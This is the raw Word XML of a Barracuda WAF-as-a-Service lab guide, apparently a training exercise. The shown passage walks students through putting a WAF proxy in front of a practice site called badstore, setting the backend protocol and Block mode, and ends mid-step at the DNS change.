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99217" w14:textId="497D1A52" w:rsidR="008567D8" w:rsidRDefault="7F698058" w:rsidP="30DB4EA1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44435BD5" wp14:editId="2BD6BD62">
            <wp:extent cx="1721644" cy="471796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1052260985" name="Picture 105226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2609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1644" cy="471796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="59C4101A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF0CE1" w14:textId="77777777" w:rsidR="008D6465" w:rsidRDefault="70401691" w:rsidP="59C4101A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A20E3" w14:textId="15FDFE5D" w:rsidR="008567D8" w:rsidRDefault="243BD87F" w:rsidP="00D7043B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF-as-a-Service </w:t>
      </w:r>
      <w:r w:rsidR="739EE5E2">
        <w:t xml:space="preserve">Lab Guide </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1C2FB" w14:textId="77777777" w:rsidR="00D7043B" w:rsidRDefault="00D7043B" w:rsidP="008D6465"/>
    <w:p w14:paraId="4C13FB78" w14:textId="42B9B7EC" w:rsidR="008D6465" w:rsidRPr="008D6465" w:rsidRDefault="008D6465" w:rsidP="008D6465">
      <w:r>
        <w:t>Version 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BB0D0" w14:textId="2ECAE6A6" w:rsidR="59C4101A" w:rsidRDefault="59C4101A"/>
    <w:p w14:paraId="62D3986C" w14:textId="415A7901" w:rsidR="59C4101A" w:rsidRDefault="59C4101A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FD995" w14:textId="1A5D700E" w:rsidR="004B6A8F" w:rsidRPr="00A859D0" w:rsidRDefault="004B6A8F" w:rsidP="004B6A8F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In this lab guide, you will learn to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1B74F" w14:textId="712D3F6A" w:rsidR="00C34781" w:rsidRPr="00A859D0" w:rsidRDefault="00C34781" w:rsidP="004B6A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configure WAF-as-a-Service to secure the site based on the customer’s requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6AE8E" w14:textId="7F8E235D" w:rsidR="00C34781" w:rsidRPr="00A859D0" w:rsidRDefault="00C34781" w:rsidP="004B6A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Troubleshoot and fix false positives </w:t>
      </w:r>
      <w:r w:rsidR="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– easily!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EA259" w14:textId="25231C13" w:rsidR="002F558A" w:rsidRPr="00A859D0" w:rsidRDefault="00C34781" w:rsidP="00C34781">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Address additional security concerns found by the customer during the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF3923" w14:textId="77777777" w:rsidR="00823CD9" w:rsidRDefault="00823CD9" w:rsidP="00072E2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you know your student number </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1, 2 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6481F852" w14:textId="202D958E" w:rsidR="009839C7" w:rsidRPr="00A859D0" w:rsidRDefault="00072E2A" w:rsidP="00072E2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For each step, there is a description of the customer requirement or situation.  Try to figure out how to configure WAF-as-a-Service to match customer requirements </w:t>
      </w:r>
      <w:r w:rsidR="009839C7" w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">or fix customer issues </w:t>
      </w:r>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">on your own.  </w:t>
      </w:r>
      <w:r w:rsidR="009839C7" w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The two most useful things you can do are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DBC220" w14:textId="307C7248" w:rsidR="009839C7" w:rsidRDefault="009317F6" w:rsidP="009839C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>you’re</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trying to address a security concern, c</w:t>
      </w:r>
      <w:r w:rsidR="009839C7" w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lick “Add Component” in WAF-as-a-Service and browse the component descriptions until you find one that matches what you’re trying to do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EBB0B" w14:textId="77777777" w:rsidR="00C7173F" w:rsidRPr="00A859D0" w:rsidRDefault="00C7173F" w:rsidP="00C7173F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>you’re</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> troubleshooting a false positive, reproduce the issue reported by the customer yourself (so that you get the block page) and then look at the Firewall Logs to see why you were blocked.  The logs will provide all the info you need to fix the problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138FF16" w14:textId="77777777" w:rsidR="00C7173F" w:rsidRPr="00A859D0" w:rsidRDefault="00C7173F" w:rsidP="00C7173F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4902EEDE" w14:textId="77777777" w:rsidR="0002777C" w:rsidRPr="00A859D0" w:rsidRDefault="00072E2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need help, expand the </w:t>
      </w:r>
      <w:r w:rsidR="009307BA" w:rsidRPr="00A859D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint section, if there is one. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239ABB88" w14:textId="7834A6DF" w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w:rsidP="32F6121D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BA14A6" w14:textId="1E119B02" w:rsidR="00844F45" w:rsidRDefault="009A3456" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> takes a few minutes to sync your changes so after making each change, wait a few minutes </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:t>until the configuration has synced</w:t>
      </w:r>
      <w:r w:rsidR="0A913DC5">
        <w:t xml:space="preserve"> to all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0A913DC5">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0A913DC5">
        <w:t xml:space="preserve"> datacenters in your global region. </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1360C599">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D98FCD" wp14:editId="375B1E85">
            <wp:extent cx="4876802" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1665211711" name="Picture 166521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211711"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876802" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15C254" w14:textId="6D783723" w:rsidR="699639B3" w:rsidRDefault="699639B3"/>
    <w:p w14:paraId="62228834" w14:textId="77777777" w:rsidR="009A3456" w:rsidRDefault="009A3456">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE6633" w14:textId="73BA5720" w:rsidR="00233C4A" w:rsidRDefault="009A3456" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00233C4A">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t>asics</w:t>
      </w:r>
      <w:r w:rsidR="00233C4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D997B64" w14:textId="6E53AA7C" w:rsidR="00FE727A" w:rsidRPr="006B1F5E" w:rsidRDefault="006B1F5E" w:rsidP="00823CD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1F5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Your website is </w:t>
      </w:r>
      <w:r w:rsidR="00823CD9" w:rsidRPr="006B1F5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00823CD9" w:rsidRPr="006B1F5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://badstore&lt;your student number&gt;.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00823CD9" w:rsidRPr="006B1F5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC54E9" w14:textId="15DB572C" w:rsidR="00FE727A" w:rsidRDefault="00FE727A" w:rsidP="00823CD9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if your student number is 12, you will go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00665392">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore12.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0D300" w14:textId="6096B6A5" w:rsidR="00823CD9" w:rsidRDefault="00FE727A" w:rsidP="00823CD9">
      <w:r>
        <w:t xml:space="preserve">As you can see, the site is </w:t>
      </w:r>
      <w:r w:rsidR="00823CD9">
        <w:t xml:space="preserve">listening on port 80, yikes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00823CD9">
        <w:t>that’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00823CD9">
        <w:t xml:space="preserve"> a bad idea because it’s not encrypted but we will provide the SSL for them, not to worry!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65280E9A" w14:textId="5A000422" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:r>
        <w:t xml:space="preserve">The first step is get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve">Barracuda </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the customer </w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:t>site.</w:t>
      </w:r>
      <w:r w:rsidR="009A3456">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7FB7F" w14:textId="48B99037" w:rsidR="00D412E1" w:rsidRDefault="00D412E1" w:rsidP="00D412E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidR="00FE727A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE727A">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE727A">
        <w:t xml:space="preserve"> administration console at </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00FE727A" w:rsidRPr="00665392">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://waas.barracudanetworks.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DFEC8CA" w14:textId="3423F409" w:rsidR="00D412E1" w:rsidRDefault="00D412E1" w:rsidP="00D412E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log in with the email and password provided. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5ADE55" w14:textId="26D27D76" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click “Add Application”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423EB1C" w14:textId="2A4F7564" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the application name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455752D2" w14:textId="2715E026" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;your </w:t>
      </w:r>
      <w:r w:rsidR="00FE727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>student number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;.cudathon.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the domain name, and click Continue.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246222AF" w14:textId="6F221BEB" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leave the HTTPS and HTTP screen default, click Continue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A960BAC" w14:textId="55585B8E" w:rsidR="00233C4A" w:rsidRDefault="00233C4A" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For the backend server, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70743">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>change the protocol to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the port to </w:t>
      </w:r>
      <w:r w:rsidRPr="00233C4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:t>, and click “test connection</w:t>
      </w:r>
      <w:r w:rsidR="00775B17">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00EA0F90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Click Continue.</w:t>
      </w:r>
      <w:r w:rsidR="00671D54" w:rsidRPr="00671D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00671D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8AFA23" wp14:editId="1479A1F9">
            <wp:extent cx="4380931" cy="2908919"/>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323" cy="2915819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00671D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F52E9" w14:textId="633A6276" w:rsidR="00EA0F90" w:rsidRDefault="00EA0F90" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidR="0034774B">
        <w:t xml:space="preserve"> the mode to “Block” </w:t>
      </w:r>
      <w:r>
        <w:t>and click Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5682A3DA" w14:textId="77777777" w:rsidR="00132AF4" w:rsidRDefault="00132AF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077B768" w14:textId="77777777" w:rsidR="00406195" w:rsidRDefault="00EA0F90" w:rsidP="00233C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On the next screen, it will tell you to change the DNS record, we </w:t>
      </w:r>
      <w:r w:rsidR="00F7505A">
        <w:t xml:space="preserve">will not </w:t>
      </w:r>
      <w:r>
        <w:t>do that here</w:t>
      </w:r>
      <w:r w:rsidR="00330717">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406195">
        <w:t xml:space="preserve">because we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00406195">
        <w:t>don’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00406195">
        <w:t xml:space="preserve"> have control over the DNS server for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00406195">
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00406195">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00330717">
        <w:t>so just click close.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFA32C" w14:textId="77777777" w:rsidR="00406195" w:rsidRDefault="00406195" w:rsidP="00406195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4064127E" w14:textId="63D28F32" w:rsidR="00EA0F90" w:rsidRDefault="00330717" w:rsidP="00406195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="00EA0F90">
        <w:t xml:space="preserve">ut </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in real life, </w:t>
      </w:r>
      <w:r w:rsidR="00EA0F90">
        <w:t>you would</w:t>
      </w:r>
      <w:r w:rsidR="0034774B">
        <w:t xml:space="preserve"> go to your DNS server, and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">make this CNAME change to </w:t>
      </w:r>
      <w:r w:rsidR="0034774B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0034774B">
